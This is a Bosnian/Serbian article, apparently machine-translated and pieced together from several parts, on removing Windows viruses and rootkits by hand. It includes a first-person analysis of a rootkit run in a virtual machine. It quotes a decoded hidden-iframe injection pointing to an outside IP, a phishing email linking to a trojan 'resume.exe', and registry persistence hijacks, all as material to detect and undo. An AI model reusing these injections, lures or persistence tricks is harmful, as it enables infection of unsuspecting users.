Dakle, danas ćemo razgovarati s vama o tome kako ručno ukloniti virus sa vašeg računala. Pored toga, hajde da vidimo na šta se trojanci mogu sresti, kako se manifestuju i odakle se mogu uvesti u računar. Hajde da što pre pređemo na proučavanje naše današnje teme.
Vrste virusa
Pa, ali prije nego što ručno uklonite virus s računala, vrijedi razgovarati s vama o tome kakva se infekcija općenito nalazi na računalu. Zaista, u većini slučajeva od toga zavisi kako će se tretman provesti. Pa počnimo.
Prvi virus je trojanac. Riječ je o zlonamjernoj datoteci koja se "smješta" u operativni sistem, pa čak i šteti. Na primjer, ošteti ili uništi važne dokumente. Sada ih ima puno.
Drugi prilično čest tip virusa je razni ransomware. To su fajlovi koji ulaze u sistem i blokiraju ga. Ali ne uništavanje, već samo šifriranje dokumenata. Na kraju takve šifre po pravilu se ostavlja e-mail kreatora na koji se mora doznačiti određena suma novca kako bi se dokumenti vratili u prvobitni oblik.
Treći virus koji se može uhvatiti su, naravno, razni dodaci pretraživača, odnosno spam. U pravilu, oni jako puno, pa čak i ometaju rad na Internetu. To je zbog činjenice da se početna stranica korisnika može promijeniti, plus, osim toga, reklamni baneri će se nalaziti svuda u pretraživaču. Kada korisnici vide ovu sliku, razmišljaju o tome kako ručno pronaći viruse na računaru, a zatim ih ukloniti. Sada ćemo pokušati da to shvatimo.
Znakovi infekcije
Dakle, prije nego ručno pronađemo viruse i riješimo ih se jednom za svagda, pokušajmo da shvatimo šta bi vam moglo ukazivati na prisustvo kompjuterske infekcije u sistemu. Uostalom, ako na vrijeme otkrijete signale, možete izbjeći oštećenje velikog broja datoteka i gubitak "operativnog sistema".
Prvi i najočigledniji znak nisu ništa drugo do poruke iz vašeg antivirusnog programa. On će "psovati" neke dokumente i fajlove, dajući vam ime navodnog virusa. Istina, ponekad se antivirus tako ponaša u odnosu na razne krekove i "tablete" do kompjuterskih igrica. Ipak, ovo se ne može zanemariti.
Drugi scenario je da vaš računar počinje da "usporava". Tada korisnici počinju aktivno razmišljati o tome kako ručno ukloniti virus, pogotovo ako nemaju antivirusni program. Dakle, čim primijetite da vam je sistem postao "sporo pametan", počnite oglašavati alarm.
Drugi scenario je da su se na računaru počeli pojavljivati novi programi koje niste instalirali. Sasvim uobičajen potez među kompjuterskom infekcijom.
Osim toga, reklame u pretraživaču mogu ukazivati na to da je računar zaražen. Promjena početne stranice bez mogućnosti oporavka, reklamni baneri posvuda i posvuda - sve su to prilično alarmantni signali. Dakle, hajde da brzo vidimo kako se to radi ručno sa računara.
Traži
Pa, prvo što treba da uradite je da počnete sa traženjem mesta gde je infekcija skrivena. Ovo je ponekad veoma teško uraditi. Pogotovo ako nemate antivirusni program. Generalno, da vidimo šta se može učiniti u ovoj situaciji.
Dakle, kada odlučite da se sami borite protiv virusa, moraćete da pronađete fasciklu na računaru u kojoj je pohranjen. Ponekad se infekcija izdaje stvaranjem vlastitih procesa u Open it (Ctrl + Alt + Del), a zatim idite na karticu "Procesi". Sada pronađite tamo bilo koju sumnjivu liniju (nekako će se čudno zvati, ili čak potpisati hijeroglifima) i kliknite na dugme "prikaži lokaciju datoteke". Gotovo, virus pronađen.
Istina, nije uvijek sve tako lako i jednostavno. Ako razmišljate kako da ručno uklonite virus sa svog računara, onda bi trebalo da znate da je infekcija računara često dobro skrivena. U prikazu fascikli označite polje "prikaz i fascikle". Pretraživanje će sada biti mnogo lakše.
Zapamtite takođe da se oni vrlo često "nastanu" u Windows folderu. Na primjer, većina trojanaca se nalazi u System32. Neka infekcija se može "registrovati" u host fajlu. Znamo omiljena mjesta virusa. Ali kako ih se riješiti?
Čekovi
Prvi scenario je automatsko uklanjanje infekcije. Tačnije, poluautomatski. Radi se o provjeri virusa pomoću antivirusnog programa.
Kako biste sebi osigurali pouzdanu zaštitu podataka, nabavite dobar antivirus. Dr.Web je odličan. Ako vam se ne sviđa, možete isprobati i Nod32. I on prilično dobro obavlja zadatak.
Uradite duboku proveru. Nakon što vam program da rezultate, pokušajte automatski izliječiti dokumente. Nije uspjelo? Zatim ih obrišite. Međutim, ako razmišljate kako da ručno uklonite virus sa svog računala, onda vam najvjerovatnije antivirusne provjere nisu pomogle. Hajde da vidimo šta još možeš da uradiš.
Brišemo programe
Drugi korak na putu ozdravljenja sistema je, naravno, uklanjanje raznih sadržaja koje vam je virus uputio. Ovo je prilično česta pojava. Dakle, pogledajte "kontrolnu tablu" i odatle pređite na "dodavanje ili uklanjanje programa". Pričekajte malo dok provjerite sadržaj na vašem računaru.
Kada se pred vama pojavi lista programa, izbrišite sve što ne koristite. Obratite posebnu pažnju na sadržaj koji niste instalirali. Ili onaj koji se pojavio kao "trailer" nakon što je završena instalacija nekog drugog "programa". Desnom tipkom miša kliknite na željenu liniju, a zatim odaberite naredbu "izbriši". Spreman? Tada možete razmišljati o tome kako ručno ukloniti virus sa svog računala.
Totalno skeniranje
Hajde sada da iskoristimo neke od usluga i tehnika koje će nam sigurno pomoći. Ako znate naziv virusa (posebno ako ste suočeni sa neželjenom poštom), onda je traženje infekcije pomoću računalnog registra pogodno za vas.
Da biste otišli na traženu uslugu, pritisnite kombinaciju tipki Win + R, a zatim pokrenite naredbu "regedit". Pogledajte šta se pojavljuje pred vama. Na lijevoj strani prozora nalaze se fascikle sa dugim i nerazumljivim nazivima. U njima se često kriju virusi. Ali mi ćemo malo olakšati naš zadatak pretraživanja. Dovoljno je otići na "edit" i zatim kliknuti na "traži". Unesite naziv virusa i provjerite ga.
Nakon prijema rezultata, sve linije koje se pojavljuju moraju se izbrisati. Da biste to učinili, kliknite na svaki od njih redom, a zatim odaberite potrebnu naredbu. Sve je spremno? Zatim ponovo pokrenite računar. Sada znate kako ručno ukloniti virus sa svog računara.
U ovom članku ću vam reći kako očistite računar od virusa sa 99% garancije, jer nijedan savremeni antivirus ne može pružiti 100% zaštitu. Ako ne želite da čitate duže vrijeme ili pogriješite, možete pogledati naš video ispod.
Uključite radnu površinu -> pritisnite dugme za početak -> kontrolna tabla -> male ikone u gornjem desnom uglu -> opcije foldera -> kartica za pregled -> spustite klizač nadole i poništite izbor u polju za potvrdu: Sakrij zaštićene sistemske datoteke, sakrij ekstenziju za registrovane vrste datoteka i stavite tačku nasuprot Prikaži skrivene fajlove i fascikle -> kliknite na primeni pa OK.
Opet moj kompjuter -> disk c -> korisnici -> folder sa vašim korisničkim imenom -> AppData -> Lokalno -> Temp -> ponovo izaberite sve fajlove i izbrišite ih -> vratite se u Lokalni folder i izostavite do samog dna i izbrišite svi dokumenti ( ne dirajte fascikle, budite oprezni
), osim onih sa završetkom DAT, ini.
Preuzmite malwarebytes anti malware instalirajte program na kraju instalacije poništite probni period PRO. Nakon prvog pokretanja programa, morat ćete izvršiti ažuriranje, pričekajte da se ažuriranje završi, u prozoru koji se otvori stavite tačku pored natpisa Puna provjera. Sačekajte da se završi skeniranje vašeg računara na viruse. Ako se pronađu virusi, nakon skeniranja ih morate ukloniti. U prozoru koji se pojavio sa listom virusa označite sva polja i kliknite na dugme Ukloni pretnje. Program može zahtijevati ponovno pokretanje računara da bi se uklonili virusi. Ponovo pokrenite i pokrenite skeniranje, ako se virus ponovo pronađe, uradite još nekoliko provjera, ali ne više od 4. Ako se nakon 4 provjere pronađu virusi, tada ih neće biti moguće ukloniti, već su čvrsto integrirani u vaš sistem, lakše je ponovo instalirati Windows. Ako ste ipak uspjeli ukloniti sve prijetnje. Za više samopouzdanja, možete provjeriti svoj računar pomoću standardnog antivirusnog programa.
Nakon završetka svih ovih koraka, u većini slučajeva, vaš računar će početi brže raditi, biće potpuno očišćen od virusa. Još uvek možeš Šta učiniti ako se antivirusni program nije nosio sa svojim radom.
& nbsp & nbsp Vjerovatno ste u više navrata u medijima susreli informaciju da se pojavio novi strašni virus, koji može dovesti do nove strašne epidemije i gotovo do kraja interneta. Ili, da se pojavila nova tehnologija pisanja virusa, zasnovana na korištenju najmanje značajnih bitova piksela grafičkih slika, a tijelo virusa je gotovo nemoguće otkriti. Ili... puno drugih ružnih stvari. Ponekad virusi daju gotovo razum i samosvijest. To se događa zato što mnogi korisnici, zbunjeni u složenoj klasifikaciji i detaljima mehanizma funkcionisanja virusa, zaboravljaju da je, prije svega, svaki virus kompjuterski program, tj. skup procesorskih instrukcija (instrukcija), formatiranih na određeni način. Nije bitno u kom obliku postoji ovaj skup (izvršna datoteka, skripta, dio boot sektora ili grupa sektora izvan sistema datoteka) – mnogo je važnije da ovaj program ne može dobiti kontrolu, tj. početi izvršavati. Virus upisan na vaš čvrsti disk, ali ne radi, bezopasan je kao i svaka druga datoteka. Glavni zadatak u borbi protiv virusa nije otkriti tijelo virusa, već spriječiti mogućnost njegovog lansiranja. Stoga kompetentni proizvođači virusa neprestano unapređuju ne samo tehnologije za uvođenje zlonamjernog softvera u sistem, već i metode tajnog pokretanja i funkcioniranja.
Kako se računar inficira zlonamjernim softverom (virusom)? Odgovor je očigledan - neki program mora biti pokrenut. Idealno - sa administrativnim pravima, po mogućnosti - bez znanja korisnika i nevidljivo za njega. Metode pokretanja se stalno poboljšavaju i zasnivaju se ne samo na potpunoj obmani, već i na karakteristikama ili nedostacima operativnog sistema ili aplikativnog softvera. Na primjer, korištenje funkcije automatskog pokretanja za prenosive medije u okruženju operativnog sistema Windows dovelo je do širenja virusa na fleš diskovima. Funkcije za automatsko pokretanje se obično pozivaju sa prenosivog medija ili iz zajedničkih mrežnih fascikli. Prilikom automatskog pokretanja, datoteka se obrađuje Autorun.inf... Ova datoteka određuje koje naredbe sistem izvršava. Mnoge kompanije koriste ovu funkciju za pokretanje instalatera svojih softverskih proizvoda, međutim, počeli su je koristiti i proizvođači virusa. Kao rezultat toga, možete zaboraviti na automatsko pokretanje kao neku pogodnost kada radite na računaru. - većina pismenih korisnika je zauvijek onemogućila ovu opciju.
Da biste onemogućili funkcije automatskog pokretanja u Windows XP / 2000, reg fajl za uvoz u registar.
Za Windows 7 i novije verzije, možete onemogućiti automatsku reprodukciju pomoću apleta AutoPlay na kontrolnoj tabli. U ovom slučaju, isključenje se odnosi na trenutnog korisnika. Pouzdaniji način zaštite od unošenja virusa koji se prenose na prenosivim uređajima je blokiranje automatskog pokretanja za sve korisnike pomoću grupnih politika:
& nbsp & nbsp Ali glavni "snabdevač" virusa je nesumnjivo Internet i, kao glavni aplikativni softver - "Internet Explorer" (pretraživač). Web stranice postaju sve složenije i ljepše, pojavljuju se nove multimedijalne mogućnosti, društvene mreže rastu, broj servera se stalno povećava i broj njihovih posjetitelja raste. Internet pretraživač se postepeno pretvara u složeni softverski paket - tumač podataka primljenih izvana. Drugim riječima, u softverski paket koji izvršava programe zasnovane na nepoznatom sadržaju. Programeri pretraživača (pretraživača) neprestano rade na poboljšanju sigurnosti svojih proizvoda, ali i proizvođači virusa idu naprijed, a vjerovatnoća zaraze sistema malverom ostaje prilično visoka. Postoji mišljenje da ako ne posjetite "stranice za odrasle", stranice sa serijskim brojevima softverskih proizvoda itd. tada se infekcija može izbjeći. Ovo nije sasvim tačno. Na internetu postoji mnogo hakovanih sajtova čiji vlasnici nisu ni svjesni hakovanja. I davno su prošla vremena kada su krekeri udovoljavali svojoj taštini zamjenom stranica (deface). Danas takav hak obično prati uvođenje na stranice potpuno respektabilnog sajta posebnog koda za zarazu računara posetioca. Osim toga, proizvođači virusa koriste najpopularnije pojmove za pretraživanje kako bi prikazali zaražene stranice u rezultatima tražilice. Posebno su popularni upiti sa frazama "besplatno preuzimanje" i "preuzimanje bez registracije i SMS-a". Pokušajte da ne koristite ove riječi u upitima za pretraživanje, jer u suprotnom rizik od dobivanja linka na zlonamjerne stranice značajno se povećava. Pogotovo ako tražite popularni film koji još nije izašao ili posljednji koncert nekog poznatog benda.
& nbsp & nbsp Pokušaću da objasnim mehanizam zaraze računara posetioca sajta, u pojednostavljenom obliku, na primeru. Ne tako davno, kada sam posjetio prilično popularnu stranicu, dobio sam obavijest od PT Startup Monitora da je aplikacija rsvc.exe pokušava upisati u registar. Aplikaciju je uspješno zakucao FAR, a promjene u registru poništio je PT Startup Monitor. Analiza stranica sajta pokazala je prisustvo čudnog koda u jeziku Javascript koji izvodi operacije za transformaciju string podataka koji nisu smisleni tekst. Javascript je podržan od strane većine modernih pretraživača i koristi se na gotovo svim web stranicama. Skriptu preuzetu sa takvih stranica izvršava internet pretraživač. Kao rezultat brojnih transformacija gore navedenih stringova, dobijen je prilično jednostavan kod:
iframe src = "http://91.142.64.91/ts/in.cgi?rut4" širina = 1 visina = 1 stil = "vidljivost: skriveno"
Znači izvršavanje CGI skripte servera sa IP adresom 91.142.64.91 (koja nema veze sa posjećenim sajtom) u posebnom prozoru (iframe tag) dimenzija 1 piksel u širinu i 1 piksel u visinu, u nevidljivom prozor. Rezultat je vrlo vjerovatna virusna infekcija. Pogotovo ako nema antivirusa ili neće reagirati na prijetnju. Ovaj primjer skrivenog preusmjeravanja posjetitelja na zlonamjernu stranicu pomoću oznake "iframe" danas vjerovatno nije previše relevantan, ali prilično pokazuje kako, dok posjećujete legalnu stranicu, možete neprimjetno posjetiti drugu, ne baš legalnu, a da niste ni svesni to. Nažalost, ne postoji apsolutna garancija protiv virusne infekcije i morate biti spremni na činjenicu da ćete se sami morati nositi s virusom.
& nbsp & nbsp Nedavno je jedan od glavnih pravaca razvoja zlonamjernih programa postalo korištenje u njima svih vrsta zaštite od otkrivanja antivirusnim alatima - takozvana rootkit (rootkit) tehnologija. Antivirusi često ili ne otkrivaju takve programe ili ih ne uklanjaju. U ovom članku pokušat ću opisati manje-više univerzalnu tehniku za otkrivanje i uklanjanje zlonamjernog softvera iz zaraženog sistema.
& nbsp & nbsp Uklanjanje "visokokvalitetnog" virusa postaje sve više netrivijalan zadatak, budući da programeri takvom virusu daju svojstva koja otežavaju njegovo rješavanje. Često virus može raditi u kernel modu i ima neograničene mogućnosti presretanja i modifikacije sistemskih funkcija. Drugim riječima, virus ima mogućnost da sakrije svoje datoteke, ključeve registratora, mrežne veze od korisnika (i antivirusa) – sve što može biti znak njegovog prisustva na zaraženom sistemu. Može zaobići bilo koji zaštitni zid, sisteme za otkrivanje upada i analizatore protokola. I iznad svega, može raditi iu Windows Safe Boot modu. Drugim riječima, savremeni zlonamjerni softver je vrlo teško otkriti i neutralizirati.
& nbsp & nbsp Razvoj antivirusa također ne miruje – oni se stalno poboljšavaju i u većini slučajeva moći će otkriti i neutralizirati zlonamjerni softver, ali prije ili kasnije, doći će do modifikacije virusa koja će biti pretvrd za bilo koji antivirus neko vrijeme. Stoga je samootkrivanje i uklanjanje virusa posao koji će prije ili kasnije morati obaviti svaki korisnik računala.
Zdravo.
Zainteresovani smo za vašu kandidaturu, ali predlažemo da popunite
našu biografiju sa zaglavljem i pošaljite je na [email protected]
Odgovor nije zagarantovan, ali ako nas vaš životopis zanima, mi
nazvaćemo vas u roku od nekoliko dana. Nemoj zaboraviti
navedite broj telefona, kao i poziciju za koju se prijavljujete. Poželjno
takođe navesti želje za platom.
Naš memorandum možete preuzeti sa linka ispod.
http://verano-konwektor.pl/resume.exe
& nbsp & nbsp Analiza zaglavlja e-pošte je pokazala da je poslana sa računara u Brazilu preko servera u Sjedinjenim Državama. Predlaže se preuzimanje memoranduma sa servera u Poljskoj. I to sa sadržajem na ruskom jeziku.
& nbsp & nbsp Jasno je da nećete videti nikakav memorandum, a najverovatnije ćete dobiti trojanski program na svom računaru.
& nbsp & nbsp Preuzmite datoteku resume.exe. Veličina je 159744 bajtova. Još ga ne pokrećem.
& nbsp & nbsp Kopiram fajl na druge računare na kojima su instalirani razni antivirusi - samo radi još jedne provere njihove efikasnosti. Rezultati nisu tako vrući - antivirusni Avast 4.8 Home Edition delikatno ćuti. Symantec ga je ubacio "y - ista reakcija. Samo AVG 7.5 Free Edition je radio. Čini se da ovaj antivirus, zapravo, postaje sve popularniji s razlogom.
& nbsp & nbsp Svi eksperimenti se izvode na virtuelnoj mašini sa operativnim sistemom Windows XP. Nalog sa administratorskim pravima, jer se virusi najčešće uspešno unose u sistem samo ako je korisnik lokalni administrator.
& nbsp & nbsp Trčanje. Nakon nekog vremena, zaražena datoteka je nestala, izgleda da je virus započeo svoje prljavo djelo.
& nbsp & nbsp Ponašanje sistema se nije promenilo spolja. Očigledno je potrebno ponovno pokretanje. Za svaki slučaj, zabranjujem TCP veze u firewall-u. Ostavljam dozvoljene samo odlazne UDP veze: 53 (DNS) - morate ostaviti virusu barem neku priliku da pokaže svoju aktivnost. Po pravilu, nakon unošenja virus mora kontaktirati host ili dati server na Internetu, što će biti naznačeno DNS upitima. Iako, opet, u svjetlu gore navedenog, pametni virus ih može prikriti, on također može zaobići zaštitni zid. Gledajući unaprijed, reći ću da se u ovom konkretnom slučaju to nije dogodilo, ali za pouzdanu analizu mrežne aktivnosti, bolje je sav promet zaražene mašine poslati preko druge, neinficirane, gdje možete biti sigurni da je Pravila firewall-a se poštuju, a analizator saobraćaja (koristio sam Wireshark) daje ono što zapravo jeste.
& nbsp & nbsp Ponovno pokretanje. Spolja, ništa se nije promijenilo, osim činjenice da je nemoguće pristupiti Internetu, jer sam sam isključio ovu mogućnost. Ništa novo se nije pojavilo u putanjama autostarta, u uslugama ili u sistemskim katalozima. Pregled sistemskog dnevnika daje samo jedan savjet - sistem nije mogao pokrenuti tajanstvenu uslugu grande48... Nisam mogao imati takvu uslugu, a vremenom se ovaj događaj poklopio sa trenutkom implementacije. Ono što bi još sugeriralo uspješnu implementaciju je nedostatak unosa u registar za grande48 uslugu i odsustvo druge poruke u sistemskom dnevniku da usluga nije uspjela da se pokrene nakon ponovnog pokretanja. Ovo je najvjerovatnije neka mana autora virusa. Iako je beznačajan, jer većina korisnika ne pregledava dnevnik događaja, a u trenutku sumnje na infekciju ovaj unos u dnevniku možda već izostaje.
Određujemo prisustvo virusa u sistemu.
1. & nbsp & nbsp Sigurno bi trebalo biti "lijevog" prometa. Može se odrediti pomoću analizatora protokola. Koristio sam Wireshark. Odmah nakon učitavanja, prvo ga pokrećem. Sve je ispravno, postoji grupa DNS upita (kako se ispostavilo - jednom svakih 5 minuta) za određivanje IP adresa čvorova ysiqiyp.com, irgfqfyu.com, updpqpqr.com, itd. U stvari, svi Windows operativni sistemi vole da idu na mrežu kada je to potrebno, a nije neophodno, antivirusi mogu ažurirati svoje baze podataka, tako da je prilično teško utvrditi da li saobraćaj pripada virusu. Obično je potrebno proći saobraćaj kroz nezaraženu mašinu i ozbiljno analizirati njen sadržaj. Ali ovo je posebna tema. U principu, indirektni znak abnormalnosti u mrežnoj aktivnosti sistema mogu biti značajne vrednosti brojača saobraćaja provajdera, tokom zastoja sistema, brojača iz svojstava VPN konekcije itd.
2. & nbsp & nbsp Pokušajmo koristiti programe za traženje rootkita. Sada već postoji mnogo takvih programa i lako ih je pronaći na netu. Jedan od najpopularnijih je Mark Russinovich, koji se može preuzeti iz odjeljka Windows Sysinternals na Microsoft web stranici. Nije potrebna instalacija. Raspakujte i pokrenite. Kliknite na "Skeniraj". Nakon kratkog skeniranja, vidimo rezultate:
& nbsp & nbsp Inače, čak i ne upuštajući se u sadržaj redova, odmah možete primijetiti da postoje zapisi ili fajlovi koji su vrlo "svježi" u vremenu kreiranja/modifikacije (kolona "Vremenska oznaka")... Prije svega, trebali bi nas zanimati fajlovi sa opisom (kolona "Opis") - "Skriveno od Windows API-ja"- Skriveno od Windows API-ja. Sakrivanje datoteka, unosa u registratoru, aplikacija, naravno, nije normalno. dva fajla - grande48.sys
i Yoy46.sys
- to je upravo ono što tražimo. Ovo je traženi rootkit ili njegov dio registrovan pod krinkom drajvera, koji obezbjeđuje skrivenost. Prisustvo ostalih na listi za mene je bilo iznenađenje. Test je pokazao da se radi o normalnim Windows XP drajverima. Osim toga, virus je sakrio svoje prisustvo samo u fascikli \ system32
, i njihove kopije u \ system32 \ dllcache
ostao vidljiv.
& nbsp & nbsp Dozvolite mi da vas podsjetim da Windows XP koristi poseban mehanizam za zaštitu sistemskih datoteka, tzv. Windows zaštita datoteka (WFP)... Cilj WFP-a je da automatski vrati važne sistemske datoteke kada se izbrišu ili zamjene zastarjelim ili nepotpisanim kopijama. Sve Windows XP sistemske datoteke su digitalno potpisane i navedene u posebnoj bazi podataka koju koristi WFP. Fascikla se koristi za pohranjivanje kopija datoteka. \ system32 \ dllcache
i, dijelom, \ Windows \ keš drajvera
... Kada izbrišete ili zamenite jednu od sistemskih datoteka, WFP automatski kopira njenu "ispravnu" kopiju iz fascikle \ dllcache. Ako se navedena datoteka ne nalazi u fascikli \dllcache, Windows XP traži od vas da umetnete instalacioni CD za Windows XP u CD-ROM uređaj. Pokušajte da izbrišete vga.sys iz \system32 i sistem će ga odmah vratiti koristeći kopiju iz dllcache-a. A situacija kada je, kada je pokrenut sistem za oporavak datoteka, datoteka drajvera u \dllcache i nije vidljiva u \system32 - to je takođe dodatni znak prisustva rootkita u sistemu.
Uklanjamo virus iz sistema.
& nbsp & nbsp Ostaje izvršiti najvažniju radnju - ukloniti virus. Najlakši i najpouzdaniji način je da pokrenete drugi, neinficirani operativni sistem i spriječite pokretanje rutkit drajvera.
Koristimo standardnu Windows konzolu za oporavak. Uzmite instalacioni disk Windows XP i pokrenite sistem sa njega. Na prvom ekranu izaberite 2. stavku menija - pritisnite R.
Biramo sistem (ako ih ima nekoliko):
Unesite lozinku administratora.
Lista drajvera i usluga se može pogledati pomoću naredbe listsvc:
Zaista, lista sadrži Yoy46 , iako nedostaje grande48, što znači da je datoteka drajvera grande48.sys skrivena u sistemu, ali se ne učitava:
Konzola za oporavak vam omogućava da spriječite ili dozvolite pokretanje upravljačkih programa i usluga pomoću naredbi onemogućiti i omogućiti... Zabranjujemo pokretanje Yoy46 naredbom:
& nbsp & nbsp Izdajemo komandu EXIT i sistem ide na ponovno pokretanje.
Nakon ponovnog pokretanja, rootkit drajver se neće učitati, što će olakšati brisanje njegovih datoteka i brisanje registra iz njegovih unosa. Možete to učiniti ručno ili možete koristiti neku vrstu antivirusa. Najefikasniji, po mom mišljenju, biće besplatni skener baziran na dobro poznatom Dr.Web antivirusu Igoru Danilovu. Možete ga preuzeti ovdje - http://freedrweb.ru
& nbsp & nbsp Tamo možete preuzeti i "Dr.Web LiveCD" - sliku diska koja vam omogućava da vratite rad sistema zahvaćenog virusima na radnim stanicama i serverima koji koriste Windows \ Unix, kopirate važne informacije na prenosivi medij ili drugi računar , ako su radnje zlonamjernih programa onemogućile pokretanje računara. Dr.Web LiveCD ne samo da će pomoći u čišćenju vašeg računara od zaraženih i sumnjivih datoteka, već će pokušati i da izliječi zaražene objekte. Da biste uklonili virus, potrebno je da preuzmete sliku (datoteku sa ekstenzijom .iso) sa DrWeb web stranice i snimite je na CD. Kreiraće se disk za pokretanje, sa kojeg se pokreće, vođen jednostavnim i intuitivnim menijem.
& nbsp & nbsp Ako iz nekog razloga nije moguće koristiti Dr.Web LiveCD, možete isprobati antivirusni skener Dr.Web CureIt!, koji se može pokrenuti pokretanjem drugog OS-a, na primjer, koristeći Winternals ERD komandante. Za skeniranje zaraženog sistema potrebno je navesti njegov hard disk (režim „Prilagođeno skeniranje“). Skener će vam pomoći da pronađete fajlove virusa, a sve što treba da uradite je da izbrišete unose povezane sa njim iz registra.
& nbsp & nbsp Pošto su virusi naučili da se registruju da rade u režimu bezbednog pokretanja, ne škodi proveriti granu registratora:
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ SafeBoot
Odjeljci:
Minimalno- lista drajvera i servisa koji rade u sigurnom načinu rada
Mreža- isto, ali uz mrežnu podršku.
Dozvolite mi da dodam da postoji nova rootkit klasa koju predstavlja BackDoor.MaosBoot, koji se pojavio krajem 2007. Ovaj trojanski program se upisuje u sektor za pokretanje hard diska i omogućava skrivenu instalaciju svog drajvera u memoriju. Sam rutkit drajver se direktno upisuje u poslednje sektore fizičkog diska, zaobilazeći sistem datoteka, koji skriva svoje prisustvo na disku. Općenito, princip nije nov, prije deset godina zlonamjerni softver je bio maskiran na ovaj način na sigurnosne kopije disketa i tvrdih diskova, ali se pokazalo vrlo učinkovitim, budući da se većina antivirusa još uvijek ne može nositi sa zadatkom uklanjanja BackDoor.MaosBoot. Gore spomenuti sektor za pokretanje ne provjerava, a sektori na kraju diska za njega nemaju nikakve veze sa sistemom datoteka i, naravno, neće otkriti takav rootkit. Istina, Dr.Web (a samim tim i Cureit) se dobro nosi sa BackDoor.MaosBoot-om.
& nbsp & nbsp Ako sumnjate u datoteku, možete koristiti besplatnu internetsku antivirusnu uslugu virustotal.com. Upotrijebite poseban obrazac na glavnoj stranici web-mjesta da otpremite sumnjivu datoteku i pričekajte rezultate. Virustotal koristi konzolne verzije mnogih antivirusnih programa da skenira vašu sumnjivu datoteku. Rezultati se prikazuju na ekranu. Ako je datoteka zlonamjerna, tada ćete je s velikom vjerovatnoćom moći utvrditi. U određenoj mjeri, usluga se može koristiti za odabir "najboljeg antivirusa".
link na jednu od tema na forumu virusinfo.info, gdje korisnici postavljaju veze na različite resurse posvećene antivirusnoj zaštiti, uklj. i online - provjerava vaš računar, pretraživač, fajlove...
& nbsp & nbsp Ponekad, kao rezultat netačnih radnji virusa (ili antivirusa), sistem generalno prestaje da se učitava. Dozvolite mi da vam dam tipičan primjer. Zlonamjerni programi pokušavaju da se infiltriraju u sistem koristeći različite, uključujući prilično neobične, metode. Tokom inicijalnog procesa pokretanja, čak i prije nego što se korisnik registruje, pokreće se Session Manager (\ SystemRoot \ System32 \ smss.exe), čiji je zadatak da pokrene podsisteme i usluge (servise) visokog nivoa operativnog sistema. U ovoj fazi pokreću se procesi CSRSS (Client Server Runtime Process), WINLOGON (Prijava na Windows), LSASS (LSA shell) i preostali servisi sa parametrom Start = 2 iz ključa registratora
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services
& nbsp & nbsp Informacije specifične za Session Manager nalaze se u ključu registratora
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Session Manager
Jedan od načina da ga uvedete u sistem je zamjena dll datoteke za CSRSS. Ako pogledate sadržaj posta
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Session Manager \ SubSystems
Naći ćete značenja
ServerDll = basesrv, ServerDll = winsrv... Biblioteke basesrv.dll i winsrv.dll su "ispravne" sistemske datoteke koje učitava CSRSS usluga na normalnom (neinficiranom) sistemu. Ovaj unos u registru može se ispraviti na unos koji omogućava učitavanje, na primjer, umjesto basesrv.dll, zlonamjernog basepvllk32.dll:
ServerDll = basepvllk32 (ili neki drugi dll osim basesrv i winsrv)
Ovo će osigurati, pri sljedećem ponovnom pokretanju, da je zlonamjerni softver pod kontrolom. Ako vaš antivirus otkrije i ukloni ugrađeni basepvllk32, ostavljajući unos u registrator netaknutim, tada će pokretanje sistema završiti sa "plavim ekranom smrti" (BSOD) sa greškom STOP c000135 i porukom o nemogućnosti učitavanja basepvllk32.
Situaciju možete ispraviti ovako:
Pokrenut će se sa konzole za oporavak (ili bilo kojeg drugog sistema) i kopirati datoteku basesrv.dll iz fascikle C: \ WINDOWS \ system32 u istu fasciklu pod imenom basepvllk32.dll. Nakon toga, sistem će se pokrenuti i možete ručno ispraviti unos u registratoru.
- pokrenite sistem koristeći Winternals ERD Commander i popravite unos u registratoru ServerDll = basesrv... Ili vratite sistem unazad koristeći tačku vraćanja.
& nbsp & nbsp Još jedan tipičan primjer. Zlonamjerni softver se registruje kao program za otklanjanje grešaka za proces explorer.exe kreiranjem unosa u registru kao što je:
"Debugger" = "C: \ Programske datoteke \ Microsoft Common \ wuauclt.exe"
Uklanjanje wuauclt.exe antivirusom bez brisanja unosa u registratoru čini da explorer.exe ne može da se pokrene. Kao rezultat toga, na kraju imate praznu radnu površinu, bez ikakvih dugmadi ili prečica. Možete izaći iz situacije koristeći kombinaciju tipki CTRL-ALT-DEL. Odaberite "Upravitelj zadataka" - "Novi zadatak" - "Pregledaj" - pronađite i pokrenite uređivač registra regedit.exe. Zatim izvadite ključ
HKM \ SOFTVER \ Microsoft \ Windows NT \ CurrentVersion \ Opcije izvršavanja datoteke slike \ explorer.exe
i ponovo pokrenite.
& nbsp & nbsp U slučaju kada znate tačno kada je sistem zaražen, vraćanje na tačku vraćanja prije ovog događaja je prilično pouzdan način da se riješite infekcije. Ponekad ima smisla izvršiti ne potpuno vraćanje, već djelomično, uz vraćanje datoteke registra SYSTEM, kao što je opisano u članku "Problemi s učitavanjem OS-a" u odjeljku "Windows"
& nbsp & nbsp == Maj 2008. ==
Dodatak
& nbsp & nbsp Ovaj dodatak je došao otprilike godinu dana nakon što je napisan glavni članak. Ovdje sam odlučio objaviti najzanimljivija rješenja koja su nastala u procesu borbe protiv zlonamjernog softvera. Nešto kao kratke bilješke.
Nakon uklanjanja virusa, nijedan antivirus ne radi.
& nbsp & nbsp Slučaj je zanimljiv po tome što se metoda blokiranja antivirusnog softvera može koristiti u borbi protiv izvršnih datoteka virusa. Sve je počelo činjenicom da nakon uklanjanja prilično primitivnog virusa, licencirani Stream Anti-Virus nije radio. Ponovne instalacije sa čišćenjem registra nisu pomogle. Pokušaj instaliranja Avira Antivir Personal Free je uspješno završen, ali sam antivirus se nije pokrenuo. U sistemskom dnevniku je došlo do isteka poruke prilikom pokretanja usluge "Avira Antivir Guard". Ručno ponovno pokretanje je završilo sa istom greškom. Štaviše, u sistemu nisu obavljeni nikakvi nepotrebni procesi. Postojala je stopostotna sigurnost - nije bilo virusa, rootkita i drugih gadnih stvari (malware) u sistemu.
